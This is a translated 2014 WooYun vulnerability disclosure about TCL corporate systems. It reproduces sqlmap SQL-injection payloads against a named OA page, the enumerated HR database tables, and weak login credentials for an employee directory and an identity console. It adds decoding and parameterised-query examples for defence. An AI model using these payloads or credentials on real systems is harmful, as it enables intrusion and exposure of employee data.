Vulnerability summary

Defect ID: wooyun-2014-048000

Title: Vulnerability bundle in an important TCL system (SQL injection, weak passwords, information disclosure)

Related vendor: TCL official online store

Author: Mr.leo

Submitted: 2014-01-06 11:16

Fix date: 2014-02-20 11:16

Public disclosure: 2014-02-20 11:16

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability details

Disclosure status:

2014-01-06: Details sent to the vendor, awaiting vendor handling
2014-01-06: Vendor confirmed; details visible to the vendor only
2014-01-16: Details opened to core white hats and relevant domain experts
2014-01-26: Details opened to regular white hats
2014-02-05: Details opened to intern white hats
2014-02-20: Details made public

Summary:

Vulnerability bundle in an important TCL system (SQL injection, weak passwords, information disclosure)

Detailed description:

Site 1:
oa.king.tcl.com, the TCL OA office system
A search-engine query for the relevant keywords showed that this system is reachable under two different domain names.

[screenshot: 0409.jpg]

So I ran another round of testing.
The earlier report WooYun: TCL#某重要办公系统存在漏洞导致SQL注射及信息泄露 ("TCL: a critical office system has a vulnerability leading to SQL injection and information disclosure") concerns the same system under a different domain name. Did the vendor deploy two copies of the OA system and forget to consolidate them?
A reverse-IP lookup likewise shows that the two domains serve identical pages, but from different IP addresses.

[screenshot: 126.jpg]

[screenshot: 240.jpg]

http://oa.king.tcl.com/management/Regeist/Region.aspx
The txt_Account parameter on this page is not sanitised, which leads to SQL injection.
The POST request captured with Burp:

POST /management/Regeist/Region.aspx HTTP/1.1
Content-Length: 907
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://oa.king.tcl.com/management/Regeist/Region.aspx
Host: oa.king.tcl.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
cmdReturn=%b7%b5%20%bb%d8&cmdSubmit=%c8%b7%b6%a8&DDL_Area=GIC&rSex=rb_male&txtEmail=sample%40email.tst&txtMobile=987-65-4329&txtPassword=g00dPa%24%24w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa%24%24w0rD&txt_Account=123&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK%2bxZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O%2bjDwKs14G9BgL43vDkCgL%2biJimAgKWxZPnCQKFkp%2bkDQKZko%2bnDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP%2bWCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg%3d
sqlmap identified the following injection points with a total of 97 HTTP(s) requests:
---
Place: POST
Parameter: txt_Account
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: cmdReturn=返 回&cmdSubmit=确定&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(106)+CHAR(111)+CHAR(58)+CHAR(97)+CHAR(114)+CHAR(115)+CHAR(98)+CHAR(122)+CHAR(99)+CHAR(71)+CHAR(77)+CHAR(100)+CHAR(117)+CHAR(58)+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(58)-- &txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: cmdReturn=返 回&cmdSubmit=确定&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123'; WAITFOR DELAY '0:0:5';--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: cmdReturn=返 回&cmdSubmit=确定&DDL_Area=GIC&rSex=rb_male&txtEmail=sample@email.tst&txtMobile=987-65-4329&txtPassword=g00dPa$$w0rD&txtPhone=555-666-0606&txtRealName=hbepepgc&txtRePassword=g00dPa$$w0rD&txt_Account=123' WAITFOR DELAY '0:0:5'--&txt_Are=1&txt_CodeName=hbepepgc&txt_DeptCode=94102&txt_DeptID=1&txt_deptname=hbepepgc&txt_PositionID=1&txt_PositionName=hbepepgc&Txt_yzm=1&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWHQKPiviZAwKf9trPBwLp/cWfCwK+xZTmAQL2pNPGDgK1qbSRCwLW6p3MDQKE8/26DALEku2wCAKxhYrZCQKEnc64BgLkuamDBALnv57ABgKk0O+jDwKs14G9BgL43vDkCgL+iJimAgKWxZPnCQKFkp+kDQKZko+nDQKCkrukDQKPupjaCAL5hqWeCwL5hpH1AgLn1ZWrDwLvyMTdDwLkhNTGAwKE1uLwBAKMkP+WCAegzHj2x/nT1YA/qwI0Ms9RptEh&__VIEWSTATE=/wEPDwUKLTc3NzQ5NTMzN2QYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFB3JiX21hbGUFCXJiX2ZlbWFsZQUJcmJfZmVtYWxl3IeffGMEORjIK0F29nrEnwt2oTg=
---
current user: 'GICHrmDB'
current database: 'Hrm'
available databases [12]:
[*] distribution
[*] ECS
[*] Hrm
[*] Hrm_OEM
[*] HRM_SZ
[*] master
[*] model
[*] msdb
[*] OutStock
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: Hrm
[188 tables]
+------------------------------+
| dbo.AUTHORIZATION_TO_PAYMENT |
| dbo.Budge_right_tree |
| dbo.DevCmds |
| dbo.Devinfo |
| dbo.DinSysAccount |
| dbo.FAPAYMODEL |
| dbo.FAPINGZHENMODEL |
| dbo.FASUBJECT |
| dbo.FaceTmp |
| dbo.Finance_MainIndex |
| dbo.G4_worktimetable |
| dbo.HR_ConBase |
| dbo.HR_DeptToWorkNo |
| dbo.HR_UserGroup |
| dbo.HR_condition |
| dbo.Hr_OutDept |
| dbo.Hr_Position |
| dbo.Hr_Position_Bak |
| dbo.Hr_SelectTemp |
| dbo.Hrm_Freeze |
| dbo.Kq_AllWorkHour |
| dbo.OACITY |
| dbo.OAPROMARY |
| dbo.OASUPPLIERNO |
| dbo.OA_Account |
| dbo.OA_AccountRight |
| dbo.OA_BC_BudgetCost |
| dbo.OA_BC_FreebackMSG |
| dbo.OA_BC_VariableCost |
| dbo.OA_BC_userright |
| dbo.OA_Car_Booking |
| dbo.OA_Car_Driver |
| dbo.OA_Car_Info |
| dbo.OA_CartNO |
| dbo.OA_CompanyTemp |
| dbo.OA_Controlsub |
| dbo.OA_DocuMentList |
| dbo.OA_EmailRemind |
| dbo.OA_EmailRemindtest |
| dbo.OA_Exam_DB |
| dbo.OA_Exam_ExamMain |
| dbo.OA_Exam_Options |
| dbo.OA_FB_Mainmast |
| dbo.OA_FinanceList |
| dbo.OA_FinancePayMent |
| dbo.OA_GICFinancial |
| dbo.OA_Hr_CommunicationBase |
| dbo.OA_Hr_DictDB |
| dbo.OA_Hr_EducationBase |
| dbo.OA_Hr_EmployeeBase |
| dbo.OA_Hr_EmployeeBaseSed |
| dbo.OA_Hr_FamilyBase |
| dbo.OA_Hr_LaborContract |
| dbo.OA_Hr_LanguageBase |
| dbo.OA_Hr_NationalTitles |
| dbo.OA_Hr_WorkExperience |
| dbo.OA_MES_Board |
| dbo.OA_MainDocuMent |
| dbo.OA_MeetingQuitment |
| dbo.OA_MeetingRoom |
| dbo.OA_Meetingarea |
| dbo.OA_MessTrans |
| dbo.OA_MsgTemp |
| dbo.OA_NextDeptCode |
| dbo.OA_Post |
| dbo.OA_PostAccount |
| dbo.OA_ReplacecardRecord |
| dbo.OA_Role |
| dbo.OA_SMS |
| dbo.OA_UserRole |
| dbo.OA_WarehouseAuthorized |
| dbo.OA_base |
| dbo.OA_companydetail |
| dbo.OA_companymast |
| dbo.OA_companymast_bak |
| dbo.OA_deptleadership |
| dbo.OA_fiveSgr |
| dbo.OA_fiveSmsg |
| dbo.OMS_DocMain |
| dbo.OMS_MeetTable |
| dbo.OMS_Members |
| dbo.Oa_BC_Actualcost |
| dbo.Oa_BC_BUSapcodeTable |
| dbo.Oa_BC_BusinessCodeTable |
| dbo.Oa_BC_ChangeCode |
| dbo.Oa_BC_CodeTable |
| dbo.Oa_BC_Costrate |
| dbo.Oa_BC_FXrate |
| dbo.Oa_BC_SapcodeTable |
| dbo.Oa_BC_SubTable |
| dbo.Oa_Dictionary |
| dbo.Oa_Position |
| dbo.Oa_RightMast |
| dbo.Oa_dept |
| dbo.Oms_FileList |
| dbo.Oms_ItemDetail |
| dbo.Oms_ItemLog |
| dbo.Oms_ItemMenPer |
| dbo.Oms_ModelDetail |
| dbo.Oms_ModelMain |
| dbo.ProjectBase |
| dbo.ProjectItem |
| dbo.ProjectLog |
| dbo.SyncTemp |
| dbo.Sys_PrgMast |
| dbo.System_Menu |
| dbo.System_PrgMast |
| dbo.System_Update |
| dbo.System_UserMast |
| dbo.Table_1 |
| dbo.Tmp_10 |
| dbo.Tmp_9 |
| dbo.Tmp_90 |
| dbo.UserInfo |
| dbo.WF_Delegate |
| dbo.WF_ModelDetail |
| dbo.WF_ModelMast |
| dbo.[查询] |
| dbo.att_record |
| dbo.budget_upload_excel |
| dbo.deptMesTOHrm |
| dbo.dtproperties |
| dbo.fix_category |
| dbo.fix_dictdb |
| dbo.fix_fixedmast |
| dbo.fix_mark |
| dbo.fix_mess |
| dbo.fix_news |
| dbo.fix_orders |
| dbo.fix_sorts |
| dbo.hr_AddrSFZ |
| dbo.hr_RzEmailInfo |
| dbo.hr_base |
| dbo.hr_class |
| dbo.hr_department |
| dbo.hr_dept |
| dbo.hr_deptcopy |
| dbo.hr_emp_titles |
| dbo.hr_employee |
| dbo.hr_employeeBF |
| dbo.hr_employeeForSAP319 |
| dbo.hr_employee_lz |
| dbo.hr_employee_rz |
| dbo.hr_employee_tp |
| dbo.hr_employee_tpback |
| dbo.kq_DoorRecord |
| dbo.kq_LZDate |
| dbo.kq_Machines |
| dbo.kq_SpeOverTimeR |
| dbo.kq_SpeWorkRecord |
| dbo.kq_auto_Machines |
| dbo.kq_base |
| dbo.kq_cardlist |
| dbo.kq_finger |
| dbo.kq_holiday |
| dbo.kq_leave |
| dbo.kq_leaveDay |
| dbo.kq_leave_bak |
| dbo.kq_leave_main |
| dbo.kq_leavemonth |
| dbo.kq_machines_emp |
| dbo.kq_machines_log |
| dbo.kq_monthgs |
| dbo.kq_overtime |
| dbo.kq_overtime_bak |
| dbo.kq_transpose |
| dbo.kq_transpose_bak |
| dbo.kq_workday |
| dbo.kq_workday_bak |
| dbo.kq_workday_checkUp |
| dbo.kq_workmonth |
| dbo.kq_workmonth_lz |
| dbo.kq_workrecord |
| dbo.kq_workrecord_bak |
| dbo.kq_worktimetable |
| dbo.oa_TotalMoney |
| dbo.oa_TotalMoneySAP |
| dbo.oa_TotalMoney_Test |
| dbo.oa_accountbak |
| dbo.oa_totalmoney_Copy |
| dbo.oa_totalmoney_bak |
| dbo.sys_user |
| dbo.sys_userright |
| dbo.sysdiagrams |
| dbo.system_Per |
| dbo.tb_Temp |
| dbo.temptable |
+------------------------------+
There is a lot of data; a partial listing of row counts is enough to make the point:
Database: Hrm
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.kq_workrecord_bak | 22712493 |
| dbo.kq_workday_bak | 11426503 |
| dbo.kq_workrecord | 6574826 |
| dbo.kq_transpose_bak | 6475205 |
| dbo.kq_overtime_bak | 4174567 |
| dbo.kq_transpose | 2766671 |
| dbo.OA_companydetail | 1244995 |
| dbo.kq_workday | 995213 |
| dbo.kq_SpeWorkRecord | 791875 |
| dbo.kq_leave | 738136 |
| dbo.kq_overtime | 569546 |
| dbo.kq_leave_bak | 532771 |
| dbo.kq_workmonth | 407692 |
| dbo.OA_companymast | 344432 |
| dbo.kq_SpeOverTimeR | 321922 |
| dbo.OA_ReplacecardRecord | 242114 |
| dbo.hr_deptcopy | 233575 |
| dbo.kq_workday_checkUp | 202105 |
| dbo.Hr_Position_Bak | 169622 |
| dbo.Oa_BC_Actualcost | 155838 |
| dbo.kq_machines_log | 93600 |
| dbo.budget_upload_excel | 93573 |
| dbo.kq_finger | 68149 |
| dbo.OA_FinanceList | 55843 |
| dbo.hr_employee_lz | 38769 |
| dbo.kq_DoorRecord | 37621 |
| dbo.sys_userright | 35108 |
| dbo.kq_leavemonth | 31675 |
| dbo.hr_employee_rz | 27487 |
| dbo.kq_machines_emp | 24929 |
| dbo.OA_Hr_EmployeeBase | 22409 |
| dbo.kq_leaveDay | 18155 |
| dbo.Kq_AllWorkHour | 14382 |
| dbo.Tmp_9 | 13219 |
| dbo.oa_TotalMoney | 13195 |
| dbo.kq_cardlist | 12801 |
| dbo.OA_MeetingRoom | 12118 |
| dbo.Hr_Position | 11497 |
| dbo.hr_employeeBF | 10253 |
| dbo.hr_employee | 9606 |
| dbo.OA_BC_BudgetCost | 9125 |
| dbo.OA_Hr_EmployeeBaseSed | 8550 |
| dbo.Oms_ItemLog | 8432 |
| dbo.oa_totalmoney_bak | 8033 |
| dbo.oa_TotalMoneySAP | 7915 |
| dbo.hr_employeeForSAP319 | 7366 |
| dbo.UserInfo | 7243 |
| dbo.Tmp_90 | 7238 |
| dbo.OMS_Members | 7110 |
| dbo.Oms_ItemMenPer | 6367 |
| dbo.kq_LZDate | 5820 |
| dbo.OA_CompanyTemp | 5518 |
| dbo.WF_ModelDetail | 4871 |
| dbo.FAPAYMODEL | 4735 |
| dbo.FAPINGZHENMODEL | 4684 |
| dbo.OA_Account | 4404 |
| dbo.OA_SMS | 4339 |
| dbo.AUTHORIZATION_TO_PAYMENT | 3665 |
| dbo.hr_AddrSFZ | 3515 |
| dbo.OA_AccountRight | 3446 |
| dbo.Budge_right_tree | 3394 |
| dbo.OA_CartNO | 3156 |
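To make the three sqlmap payloads above easier to read (and to recognise them in IIS logs or WAF alerts), here is a small decoder. This is an added example, not part of the original report and not sqlmap's own code: it rebuilds the captured POST body with each payload in txt_Account, decodes the GBK form encoding, flags the T-SQL injection traits, and expands the CHAR(n)+CHAR(n) chain into the marker string sqlmap searches for in the response. The indicator patterns and the trimmed body template are this example's assumptions; the payload strings are copied verbatim from the sqlmap output.

```python
"""Decode the three txt_Account payloads sqlmap reported for Region.aspx.

Added example, not part of the original report or of sqlmap.
"""
import re
from urllib.parse import parse_qs, quote_plus

# Constructed body: the captured request's fields that matter, GBK-encoded
# like the original (cmdReturn = "返 回", cmdSubmit = "确定"); the long
# __VIEWSTATE / __EVENTVALIDATION blobs are left out (assumption: they do
# not affect the injection).
BODY_TEMPLATE = ("cmdReturn=%b7%b5%20%bb%d8&cmdSubmit=%c8%b7%b6%a8&DDL_Area=GIC"
                 "&txtEmail=sample%40email.tst&txt_Account={account}&txt_Are=1")

# The three payloads sqlmap reported, verbatim.
UNION_PAYLOAD = ("123' UNION ALL SELECT CHAR(58)+CHAR(105)+CHAR(106)+CHAR(111)"
                 "+CHAR(58)+CHAR(97)+CHAR(114)+CHAR(115)+CHAR(98)+CHAR(122)"
                 "+CHAR(99)+CHAR(71)+CHAR(77)+CHAR(100)+CHAR(117)+CHAR(58)"
                 "+CHAR(115)+CHAR(115)+CHAR(114)+CHAR(58)-- ")
STACKED_PAYLOAD = "123'; WAITFOR DELAY '0:0:5';--"
TIME_PAYLOAD = "123' WAITFOR DELAY '0:0:5'--"

# T-SQL CHAR(n)+CHAR(n)... chains build a string without quote characters.
CHAR_CHAIN = re.compile(r"(?:CHAR\(\d+\)\+?)+")

# Assumed indicator set for SQL Server, ordered from most to least specific.
INDICATORS = [
    ("union_select", re.compile(r"'\s*UNION\s+ALL\s+SELECT", re.I)),
    ("stacked_query", re.compile(r"'\s*;\s*WAITFOR\s+DELAY", re.I)),
    ("time_based", re.compile(r"'\s*WAITFOR\s+DELAY\s+'\d+:\d+:\d+'", re.I)),
    ("comment_terminator", re.compile(r"--\s*$")),
]


def build_body(account: str) -> str:
    """Form-encode `account` into the captured body, as sqlmap itself would."""
    return BODY_TEMPLATE.format(account=quote_plus(account))


def decode_char_chain(chain: str) -> str:
    """Turn 'CHAR(58)+CHAR(105)' into ':i'."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", chain))


def classify_account(body: str) -> dict:
    """Decode txt_Account from a GBK form body and flag injection traits."""
    params = parse_qs(body, keep_blank_values=True, encoding="gbk", errors="replace")
    value = params.get("txt_Account", [""])[0]
    hits = [name for name, rx in INDICATORS if rx.search(value)]
    markers = [decode_char_chain(m.group(0)) for m in CHAR_CHAIN.finditer(value)]
    return {"value": value, "indicators": hits, "char_markers": markers}


def analyse_report_payloads() -> dict:
    """Run the classifier over the benign value and the three sqlmap payloads."""
    cases = {"benign": "123", "union": UNION_PAYLOAD,
             "stacked": STACKED_PAYLOAD, "time": TIME_PAYLOAD}
    return {name: classify_account(build_body(p)) for name, p in cases.items()}


if __name__ == "__main__":
    for name, result in analyse_report_payloads().items():
        print(name, result["indicators"], result["char_markers"])
```

The UNION payload decodes to `:ijo:arsbzcGMdu:ssr:`: sqlmap wraps a random probe value in start and end delimiters so it can locate its own column output inside the returned HTML, which is why that single-column UNION was enough for it to enumerate users, databases and table row counts.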


Site 2:
http://eip.tcl.com/phones/login.aspx, the TCL Group address-book platform
Visiting eip.tcl.com directly shows a "site under construction" notice.

[screenshot: 1906.jpg]

A Google keyword search identified the login page.

[screenshot: 1738.jpg]

Weak credentials: username lif, password 111111
Logging in to the address-book platform exposes the details of more than 10,000 employees.

[screenshot: 2841.jpg]

Site 3:
http://idm.tcl.com/WebConsole/login/login.jsp, the TCL unified identity management system
The same weak credentials, lif / 111111, also log in here.
Not explored further.

[screenshot: 2514.jpg]

That is all.

Proof of vulnerability:

Demonstrated above.

Fix recommendations:

1# Manage domain names and IP addresses centrally
2# Filter the parameter
3# Improve security training and eliminate weak passwords
4# Chinese New Year is coming; how about a gift?
5# A high rank
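Recommendation 2 ("filter the parameter") is best done by binding txt_Account as a query parameter rather than by blacklisting characters. The following is an added example, not code from the TCL system: the real backend is SQL Server behind an ASP.NET page (where the equivalent is SqlCommand with SqlParameter), and Python's sqlite3 stands in for it here. The table and column layout is assumed: OA_Account and sys_user appear in the table list above, but their columns do not, and the rows are constructed.

```python
"""Vulnerable string-spliced lookup beside its parameterised replacement.

Added example, not the TCL application's code; sqlite3 stands in for SQL Server.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the Hrm database (columns assumed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE OA_Account (Account TEXT, RealName TEXT);
        CREATE TABLE sys_user   (UserName TEXT, Password TEXT);
        INSERT INTO OA_Account VALUES ('123', 'Registered user');
        -- constructed rows; the first mirrors the weak credential in the report
        INSERT INTO sys_user VALUES ('lif', '111111');
        INSERT INTO sys_user VALUES ('admin', 'S3cr3t!');
    """)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, account: str) -> list:
    """What Region.aspx evidently does: the form value becomes part of the SQL text."""
    sql = "SELECT Account, RealName FROM OA_Account WHERE Account = '%s'" % account
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, account: str) -> list:
    """Same query with a bound parameter: the value can never alter the statement."""
    sql = "SELECT Account, RealName FROM OA_Account WHERE Account = ?"
    return conn.execute(sql, (account,)).fetchall()


# A UNION payload in the same shape as sqlmap's, retargeted at another table.
UNION_PAYLOAD = "x' UNION ALL SELECT UserName, Password FROM sys_user--"


if __name__ == "__main__":
    db = make_db()
    print("unsafe, normal :", lookup_unsafe(db, "123"))
    print("unsafe, payload:", lookup_unsafe(db, UNION_PAYLOAD))  # credentials leak
    print("safe,   payload:", lookup_safe(db, UNION_PAYLOAD))    # no rows
```

With a bound parameter the stacked `; WAITFOR DELAY` and time-based variants sqlmap found are closed off as well, since the quote never terminates the literal. A second, independent control is worth noting: the application login GICHrmDB could enumerate all twelve databases on the server, so restricting that login to the Hrm objects it actually needs would have limited what the injection could reach.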

Copyright notice: when reposting, credit the source Mr.leo@WooYun


Vendor response

Vendor reply:

Severity: Medium

Rank: 5

Confirmed: 2014-01-06 11:25

Vendor comment:

Thank you for your attention; this has been forwarded to the relevant company for confirmation and handling.

Latest status:

None